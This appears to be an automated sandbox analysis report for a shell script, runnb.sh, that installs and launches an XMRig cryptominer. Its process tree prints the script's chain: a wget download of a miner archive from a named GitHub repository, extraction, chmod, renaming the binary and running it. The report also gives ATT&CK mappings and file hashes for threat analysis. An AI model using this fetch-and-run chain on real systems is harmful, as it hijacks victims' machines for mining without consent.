Analysis
-
max time kernel
38s -
max time network
155s -
platform
debian-12_armhf -
resource
debian12-armhf-20240221-en -
resource tags
arch:armhfimage:debian12-armhf-20240221-enkernel:6.1.0-17-armmp-lpaelocale:en-usos:debian-12-armhfsystem -
submitted
30-10-2024 07:15
Static task
static1
Behavioral task
behavioral1
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral2
Sample
runnb.sh
Resource
debian12-armhf-20240221-en
Behavioral task
behavioral3
Sample
runnb.sh
Resource
debian12-mipsel-20240221-en
Behavioral task
behavioral4
Sample
runnb.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral5
Sample
runnb.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral6
Sample
runnb.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral7
Sample
runnb.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral8
Sample
runnb.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
runnb.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
runnb.sh
-
Size
213B
-
MD5
a1189543e2f98f6696c6d857b899ab0a
-
SHA1
30b167128357a05cb5ae4d8bd386d63839d99c4d
-
SHA256
a5951456684af2a46da1bcd8c820221c97b13a439db465c2b671fa3180d838d6
-
SHA512
472e7cd110beb4c0ff9990763988190c875dccecc726753e295d4419413bfd14ed867a9a5977adf2d6e87d6e80f18abbdd0a929473f02bbfb24e1531e71d7aef
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule /tmp/xmrig-6.22.0/xmrig family_xmrig /tmp/xmrig-6.22.0/xmrig xmrig -
Xmrig family
-
Xmrig_linux family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid process 808 chmod -
Executes dropped EXE 1 IoCs
Processes:
coolioc pid process /tmp/xmrig-6.22.0/cool 810 cool -
OS Credential Dumping 1 TTPs 2 IoCs
Adversaries may attempt to dump credentials to use it in password cracking.
Processes:
sudodpkg-preconfiguredescription ioc process File opened for reading /etc/shadow sudo File opened for reading /etc/shadow dpkg-preconfigure -
Abuse Elevation Control Mechanism: Sudo and Sudo Caching 1 TTPs 1 IoCs
Abuse sudo or cached sudo credentials to execute code.
-
Processes:
aptdescription ioc process File deleted /var/log/apt/eipp.log.xz apt -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Write file to user bin folder 1 IoCs
Processes:
dpkgdescription ioc process File opened for modification /usr/bin/wget.dpkg-new dpkg -
Checks CPU configuration 1 TTPs 6 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
sendmailexim4httphttpaptwgetdescription ioc process File opened for reading /proc/cpuinfo sendmail File opened for reading /proc/cpuinfo exim4 File opened for reading /proc/cpuinfo http File opened for reading /proc/cpuinfo http File opened for reading /proc/cpuinfo apt File opened for reading /proc/cpuinfo wget -
Reads CPU attributes 1 TTPs 1 IoCs
Processes:
exim4description ioc process File opened for reading /sys/devices/system/cpu/online exim4 -
Processes:
sudotardpkgaptmvdpkghttpdpkgtarsendmaildpkgdpkgdpkg-debdpkgaptdpkg-debdpkgdpkgdpkgdpkgdpkgdescription ioc process File opened for reading /proc/sys/kernel/seccomp/actions_avail sudo File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/fd apt File opened for reading /proc/filesystems mv File opened for reading /proc/1/limits sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/crypto/fips_enabled http File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems tar File opened for reading /proc/filesystems sudo File opened for reading /proc/sys/kernel/ngroups_max sendmail File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/kernel/ngroups_max sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/meminfo dpkg-deb File opened for reading /proc/filesystems dpkg File opened for reading /proc/self/fd apt File opened for reading /proc/meminfo dpkg-deb File opened for reading /proc/self/stat sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/crypto/fips_enabled apt File opened for reading /proc/sys/kernel/cap_last_cap sudo File opened for reading /proc/filesystems dpkg File opened for reading /proc/sys/kernel/ngroups_max apt -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgettardescription ioc process File opened for modification /tmp/xmrigtar.tar.gz wget File opened for modification /tmp/xmrig-6.22.0/SHA256SUMS tar File opened for modification /tmp/xmrig-6.22.0/config.json tar File opened for modification /tmp/xmrig-6.22.0/xmrig tar
Processes
-
/tmp/runnb.sh/tmp/runnb.sh1⤵PID:691
-
/usr/bin/sudosudo apt install wget2⤵
- OS Credential Dumping
- Abuse Elevation Control Mechanism: Sudo and Sudo Caching
- Reads runtime system information
PID:698 -
/usr/sbin/sendmailsendmail -t3⤵
- Checks CPU configuration
- Reads runtime system information
PID:715 -
/usr/sbin/exim4/usr/sbin/exim4 -Mc 1t61zk-0000BX-1h4⤵
- Checks CPU configuration
- Reads CPU attributes
PID:726 -
/usr/bin/aptapt install wget3⤵
- Deletes log files
- Checks CPU configuration
- Reads runtime system information
PID:720 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:725 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:756 -
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵
- Checks CPU configuration
PID:759 -
/usr/lib/apt/methods/http/usr/lib/apt/methods/http4⤵
- Checks CPU configuration
- Reads runtime system information
PID:760 -
/bin/sh/bin/sh -c "/usr/sbin/dpkg-preconfigure --apt || true"4⤵PID:762
-
/usr/sbin/dpkg-preconfigure/usr/sbin/dpkg-preconfigure --apt5⤵
- OS Credential Dumping
PID:763 -
/usr/local/sbin/localelocale charmap6⤵PID:766
-
/usr/local/bin/localelocale charmap6⤵PID:766
-
/usr/sbin/localelocale charmap6⤵PID:766
-
/usr/bin/localelocale charmap6⤵PID:766
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:768
-
/usr/bin/sttystty -a7⤵PID:769
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:770
-
/usr/bin/sttystty -a7⤵PID:771
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:772
-
/usr/bin/sttystty -a7⤵PID:773
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:774
-
/usr/bin/sttystty -a7⤵PID:775
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:776
-
/usr/bin/sttystty -a7⤵PID:777
-
/bin/shsh -c "stty -a 2>/dev/null"6⤵PID:778
-
/usr/bin/sttystty -a7⤵PID:779
-
/usr/bin/dpkg/usr/bin/dpkg --assert-multi-arch4⤵
- Reads runtime system information
PID:780 -
/usr/bin/dpkg/usr/bin/dpkg --assert-protected-field4⤵
- Reads runtime system information
PID:781 -
/usr/bin/dpkg/usr/bin/dpkg --status-fd 18 --no-triggers --unpack --auto-deconfigure /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb4⤵
- Write file to user bin folder
- Reads runtime system information
PID:782 -
/usr/sbin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb5⤵PID:783
-
/usr/bin/dpkg-splitdpkg-split -Qao /var/lib/dpkg/reassemble.deb /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb5⤵
- Software Deployment Tools
PID:783 -
/usr/sbin/dpkg-debdpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb /var/lib/dpkg/tmp.ci5⤵PID:784
-
/usr/bin/dpkg-debdpkg-deb --control /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb /var/lib/dpkg/tmp.ci5⤵
- Reads runtime system information
PID:784 -
/usr/sbin/tartar -x -f - "--warning=no-timestamp"6⤵PID:787
-
/usr/bin/tartar -x -f - "--warning=no-timestamp"6⤵
- Reads runtime system information
PID:787 -
/usr/sbin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb5⤵PID:789
-
/usr/bin/dpkg-debdpkg-deb --fsys-tarfile /var/cache/apt/archives/wget_1.21.3-1+b1_armhf.deb5⤵
- Reads runtime system information
PID:789 -
/usr/sbin/rmrm -rf -- /var/lib/dpkg/tmp.ci5⤵PID:793
-
/usr/bin/rmrm -rf -- /var/lib/dpkg/tmp.ci5⤵PID:793
-
/usr/bin/dpkg/usr/bin/dpkg --status-fd 18 --configure --pending4⤵
- Reads runtime system information
- Software Deployment Tools
PID:794 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:795 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:796 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures4⤵
- Reads runtime system information
PID:799 -
/usr/bin/aptapt install wget2⤵
- Reads runtime system information
PID:802 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:803 -
/usr/bin/dpkg/usr/bin/dpkg --print-foreign-architectures3⤵
- Reads runtime system information
PID:804 -
/usr/bin/wgetwget https://github.com/orkaroeli/orkaroeliminer/raw/refs/heads/main/xmrigtar.tar.gz2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:805 -
/usr/bin/tartar xvf xmrigtar.tar.gz2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:806 -
/usr/local/sbin/gzipgzip -d3⤵PID:807
-
/usr/local/bin/gzipgzip -d3⤵PID:807
-
/usr/sbin/gzipgzip -d3⤵PID:807
-
/usr/bin/gzipgzip -d3⤵PID:807
-
/usr/bin/chmodchmod +x xmrig2⤵
- File and Directory Permissions Modification
PID:808 -
/usr/bin/mvmv xmrig cool2⤵
- Reads runtime system information
PID:809 -
/tmp/xmrig-6.22.0/cool./cool2⤵
- Executes dropped EXE
PID:810
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
Abuse Elevation Control Mechanism
1Sudo and Sudo Caching
1File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Indicator Removal
1Clear Linux or Mac System Logs
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
215B
MD5f978fc9a5cb7badabb639684a291caa6
SHA1b4d649699a880a58bd92235a8d5a72f828ef1a1f
SHA256107e9e95e9dbc013b80c35e1ca5d6f14c57942f484b6e79d174eb9198e96263a
SHA5121c89414d654bc145095f6bfabf203c94cde14d49d8d6622b5733bbff341d15d144c44cd527f2c80adf2ab87902e837873ff3ec47e0e52990540cb3e13b70dfba
-
Filesize
150B
MD519f1bb08cf8997837b1f738b76ca97e9
SHA1c497499ad539d6ef580c6c932a2633fe820abded
SHA25699ca11102d0994a98a76722b325f3215b30d3b3df3d722a2baebf6f9944566fa
SHA512fbb742f0fa67720e798b493a5e5ba5e72cbdde3c0ea55cfc0704f93ab97c586434a3e029f6e1e3ed655da997649aa8e9caf352018b87457755f75ca1bfe50230
-
Filesize
919B
MD50a9b0011891eae4086d16c3364e772ff
SHA198fe8a7b5b6b0c0aa7635e4e388c67c863772b69
SHA2561aa77bd6697d36e345cd7c0769613e9798106b0fed206d7f766e846b63aa10fd
SHA5129e1791e92d71b539aac8f944a3db65708ebfca102f16e3e7af429aaea1446be781c4ec5cb740a163dbc11a3bdacfed36d21262e05fcf29d896beb06ce0d59554
-
Filesize
7.9MB
MD551f989c19819a0a0625c251df6affe95
SHA13b27c895b6f9665f9287510207bfcdcb7fe6e059
SHA256fd11982f252c060a1372e81d5be57589647052b56281a5c54975ca22164f7726
SHA512ec8ce7d1960f9ae564d5654a35e2ad108ed900f3f56b38dfe4601be0db49c1a3cd9c643307b72c2bfc0c157d2640a62343cd7377f68d29327104e0e78b4bdfbd
-
Filesize
3.4MB
MD5ccdb2d76041e107dff38f962d65b3d4b
SHA1e9360c43398f3725b0a3eb87e2448ac416d96be3
SHA25611d52ee20c865f6b0b7787bfe7a06d7ce0d865e041552365b9a026a0d24cc18f
SHA512f6b090c698cb1092bf10010bbe00fed0388e7117b8397cf3113a23271bb514d0d03b559de721896994b472f26f9e3aeeddc2877d71bcc7830313e97d2171033d
-
Filesize
934KB
MD573945e4637d88baf7f802ea0f1868bdf
SHA189676c5a029d84e16df5ce2d10fe859e97287202
SHA256368f8913649cecfe75041d882d4c4d400c01a344b41cda307e29927f4bbd5647
SHA51231d458a37d148e301aad1ec8b33c2c87816dc1e71b710a96d345b39361553b8f3f8e03dd4b8fadea402a35416dc4b655403d0ca3c3a0426b51d248f742d66c39
-
Filesize
554KB
MD587850db32ddcacde37a9cee260db785e
SHA19999972069b4bda9fc33371940caadc776115c24
SHA25605ce3bf2e51b3fbff8d63b9010781107d4212e23382cdc2e06d0498959950a17
SHA5121574ca991668f57381014a2264360f754478b2be566a21cce2bc59168f471092610467a951f71bb984f639dce48d0006e59b858d9f48703e46ce787e12a83a32
-
Filesize
554KB
MD5691667079b979c3a5eb801ca05671dbe
SHA1118fc0814af1fab61638db7580152e3eccaaf93e
SHA256279a471f00c81b603c45a6eb05dbf891e2555075241301c7b2106cb87fa03785
SHA5124b99f00882f7fa3e0fadd963f03883cb20b6a59c6e83f52f91992b6e4cf8f9bc40516efe0cec59bccb78e744784b482bb7ad730182dc0146c2c8853da112c464
-
Filesize
12B
MD5c0f1f8b1d9f35439a9718a495f7454f8
SHA1d984c94e22944b82e8583e9e9715273e39adf24c
SHA2560664e0947f5b7114c73738ae117752035541360c7056237a2f11a5f89b8d214a
SHA512a1c56a0491e3757606cfb8e1e42fd7ff86fb8ffaa4be40e2cc28ae40568d22d86c84f58332a0a521d725815312b33a166bf6f94ab33b66ae8ecdf4a3a6e23e07
-
Filesize
1KB
MD515a67dcc7d6c33a7d684d6d22803409b
SHA1a3af6cf95051a9b7686f271b8dd3084a35073b67
SHA2565624aa0370b6810df23cb268228a3d70f25bb93b13938e2fd8afe24783aba1fe
SHA512311ce72bc021bb02a220f6a48c1be25c9d916222f6881c2cef5acda45141cfd0389db7281ad6500afbafbe6ec38bdeab03a32d14d657f53413535457a4d8884d
-
Filesize
6KB
MD5b6c36b24b0521a0cb7355a2286f5248d
SHA1d712c957fcf1949968d7494016b260914629982d
SHA256519d8e81fd184d638ef3d023c4884d430000ee4ea1e6228b60f1939bf386f148
SHA51209e5fc9a65b0e2cc864e0025adbd56ed2d6a518d2fa20f799ebd6a4a4bbc539e22540f6ec5f858568515c8a54512ec336b122321efb81b6644396ca599aa8fc6
-
Filesize
4KB
MD5a1edb94bda0d88c9a68cf6e78117e038
SHA1a9c7ef27deaf7b1289905d58f5a6d56474e137a0
SHA256d5cb34201f475c3f5eeba0b55f150364c64858290f11d97fdcf6086b05ef8b6b
SHA512ebd86b9dd6c675e3f564609c4d59811201287615f9ae9f47be1e7e39c242591e142da9837d20154593588801da392ba92979b43f3992e262059d2fe9319f65c1
-
Filesize
4KB
MD54b26633c549d070f79242b10f022fddd
SHA1e3aa320bb64327f26c52a63fa1c475879057a059
SHA256cea6fb2ac6eed9fb207d0aafa2080d2c7d3fea1a710f5f41cc13a535dba9943f
SHA51250be55640a88ca3bdd2af82e91b2e2e1d5f3fbd01ab863c34d1dc8da3c7b9ba9f78c26eff9b62f94e9c36a71f95af74de3fd3bfa65136ad9c03f720a4d9086fe
-
Filesize
4KB
MD5824e08675159504de0728e114178963c
SHA140430be413300ee7425a913adca97422d58ee49c
SHA256829e100e7120370a6143571686af9fb4aceb0991647cda5d5cf7e99d3c67a6a5
SHA5127ba01090fab596383e21dcab4b4d11cb7eac5430b7e9449bf38ab4e57be5e3060834cc57b25aec769afc9558f2a2aff75bf96b7215e359d679b107b5f356cbd5
-
Filesize
4KB
MD5edae9b7299f2afc09258160786a4dada
SHA1dd7aa0c8aa29e937efd88b9eb39811e1460b62b9
SHA256cf7d2275d2effcc231f426e078582b9665c4a2407e267c9e25546220308dd569
SHA5120e3341d862dde54e87b2cea0384cc79a4594f7a22a322d501fbb386559511cc8e6046bf134bc1496d04bddb80c8213dd0438368d3a5d20b82099a5a4c9cc30ff
-
Filesize
22KB
MD5ad7583ed065f78bb17e1d5e8ccc9bf44
SHA125d96df908cc8149caab14139c093fcb59da85d8
SHA256a3c9c685b939b51c76ad990734e5efed2dddb3436c0e210cb5bb902b94085238
SHA512d3db3fccb804da36daaecb46a4bc93cf7d13b3ea210f226529734fdf3df5faea98ca418d0688e35b851f7d450e76ec01b3055fb87dc9345461360453cf8a8c6c
-
Filesize
853B
MD55a72239d55c2880716d74cb6fdfe75b1
SHA16887468c3049b4b8755c3510712468a8d464a1bb
SHA256bc33a3b8105b35fdbcff26c8ad2d1c5a2f3b0163c7c01f7bb58a623d9b660889
SHA51274ccc824d1084b2dbcc621df1289864125997707638b9b997e06f499eee2ddcebbdfd325cb8d063bc5e336ae87b9197f737abdca1a8a728cc2eabff01557daac
-
Filesize
155B
MD5e03501723666b5745e138cde711d2410
SHA1dd5f52a08778cd095bbb8381a51054db090737f5
SHA25625d1ea6ede0bdc8542a03ab79e19773ddf158dad245c7bdb7894a03363048064
SHA5128b5fb0b832b8ea20c8ef351f312044166219b35a5e37e2c16bfd848603971d013eda8386775d65363f8b506a402fd4d2f807273a807625a69e6ce27aa7a921bb
-
Filesize
34B
MD5d7d96d63d643a4ce3e408eba7dfcedc5
SHA1c53607f95c5c57beafc1d8266646797a035f76ea
SHA25621db3a59b2d0ce18fb250b787d6e2c85d12919f5fdf1448c8f48207c4083b159
SHA512703a03e54776a6ad9b8adc6c475bbc91c06502618fa3b6f495b1a01a4f6f7aa6fb65dc6ba6885ddc6af961627062f1ce1e1d66688288cbd3bef7754d249fa9b3
-
Filesize
1004B
MD5d33a85f584da5958b6bd803d178bd2d2
SHA11b7a0a4c1f616f6c6a158102fbb364c1d92d99a9
SHA256478e399ac6c6cfaa35ca82c0c9b406c163678efcaf3a3a26cfb972add91b972f
SHA51226cb244a0e5f24cc95144713339222111d7c88e8dc1b2a05b54837c3aa3b3fd36ea63c21100ab669bd7894eb5003f7899fe314c3ca0ea08547a88bbce679d2cd
-
Filesize
89B
MD594f2e5728de1c78dbe10c7a2961d23d5
SHA18131034f2445d1519bbe5011d74978599d8e8d1f
SHA2569a66f5e2aecdae7df519edeeeb695447d38c70a9a9c07a3bc11b8e3e98a9a7d2
SHA512958047d6f59903e96a3025df1874b6fffccf7d7783719877037228c120f6963667cef61c32a4e6c142626dbcb11bf35fa00ad9f2464aab7fdf15dccefb6ea494
-
Filesize
288B
MD54e04a6e0b87631a47e15488c9ce3361d
SHA1f8e1bea97da3fb89984eea7538898150bdd253ff
SHA25661523ee7af2c6cc4da61c11c410cd1428015c709f5a64d3c309ff273f8ab091e
SHA512635a22dd60893c1220e1015dc139fefaceff2fea98952fd38dc4e29542f8382ee7abdd50169b41e92b1df647f898765696a524c028e8db0d45e071bf09e2065b